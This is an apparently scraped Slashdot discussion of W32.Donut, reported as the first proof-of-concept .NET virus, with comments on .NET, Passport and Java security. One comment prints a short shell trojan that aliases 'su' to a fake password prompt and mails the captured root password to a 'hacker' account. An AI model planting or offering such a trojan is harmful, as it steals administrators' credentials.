First (proof-of-concept) .NET virus 384
Juergen Kreileder writes "Symantec
says they've received W32.Donut, the first .NET virus: 'This virus targets EXE files that were created for the Microsoft .NET framework. W32.Donut is a concept virus. It does not have any significant chance to become wide spread. However it shows that virus writers are paying close attention to the new .NET architecture and attempting to learn how to exploit it before the Framework will be available on most systems.'"
.NET? (Score:2, Interesting)
Even if I hate .NET, I have to be realistic... (Score:4, Interesting)
.NET is dangerous. It's a security disaster waiting to happen. I don't want to use it if I can avoid it...
See last sentence. WILL we be able to avoid it, realistically? A lot of /.'ers might be able to, but folks who still have to live and work with Microsoft products in the workplace or even at home and want to get things done online might not have a choice. If online shopping services convert over to .NET or god forbid my bill payment services, it's going to be very difficult to avoid having to make that Passport account and start using .NET.
So, taking the hypothetical stance that one would need to eventually get registered to use .NET services they can't avoid using, what can be done to protect yourself and your data? Are there any .NET developers out there who can comment on how much risk is involved and how it can be minimized beyond 'Don't use it'?
Silly Question (Score:1, Interesting)
Origin? (Score:5, Interesting)
I wonder if this too, was a similar sort of event.
Symantec. (Score:3, Interesting)
I know most people won't agree, but doesn't Symantec stand to make a mint if this is true?
I guess they needed a virus before they released anti-virus software.
Re:Even if I hate .NET, I have to be realistic... (Score:5, Interesting)
AOL will almost certainly throw their millions of users towards some other system, and web sites will be forced to support both AOL's system or Microsoft's, or neither (they will probably just stick with whatever they are doing now).
Trust me, Microsoft's Passport numbers look impressive, but that's almost entirely due to Hotmail (which Microsoft doesn't charge for). In other words they have a load of crap data, and they are just now trying to get folks to actually associate this information with useable information like credit card numbers. To make matters even more interesting, Microsoft has had several well published security exploits. Only the dimmest of dim bulbs is going to trust Microsoft with their billing information (especially since chances are good that all of the places that they purchase things online already have this information). AOL, on the other hand, already has billing information for each and every one of their customers. They have literally got exactly what they need to make Internet Shopping truly painless.
Better yet, there is at least some chance that AOL will share their Passport equivalent, which will almost certainly spread to other large ISPs.
And finally, every eCommerce site currently in existance already has a way to charge you money. They aren't likely to throw their old software away and change to a .NET only site. Microsoft is the only company I can think of that has a good reason to force paying customers towards .NET.
Worrisome first volley (Score:5, Interesting)
OTOH, Microsoft, jealous of Java's success, is attempting a similar model and boasts similar security measures, claiming that with
The problem is that M$ is cutting a bunch of corners that make me very nervous. For example, the user only compiles a program the first time he runs it. After that a machine-code file is left on the user's machine for further runs. Also, M$ is attempting to mix "Managed Code" in with "Unmanaged Code". Their attempt is to make their apps run faster than Java code. But I'm afraid we're going to bear the misfortunes of their aggressive tactics, by being the real victims of a new wave of viruses exploiting these new holes...
Passport and .NET Security... (Score:4, Interesting)
Re:Virus Check every SWF, etc? (Score:1, Interesting)
profile:
alias su="trojan_su;unalias su"
trojan_su:
#!/bin/sh
echo "password: "
line >> mail hacker -s "root's password"
echo "bus error - core dump"
The Score So Far (Score:2, Interesting)
Java Virii: 0
Seriously, wouldn't a Java virus be great? I mean, it runs on just about anything (including your PlayStation 2). I wonder why there aren't any roaming the net . . .
Maybe because Sun actually put some effort into the security aspects of an inherently dangerous idea?
Comment removed (Score:3, Interesting)
Conceptual Virii (Score:1, Interesting)
Just like Dodge has their Concept Car (GT2 anyone) the virii folks have their concept virii, Microsoft will never catch a break.
But I'm kind of scared about Linux virii, it's dangerous because it doesn't seem to be as much of a "problem" but it could be one day. And with most servers being run on apache, alot of those processes are started on linux boxes. Now imagine a virus that would span across all *nix enviroments, yikes!
or *bsd yikkkes!
Gallix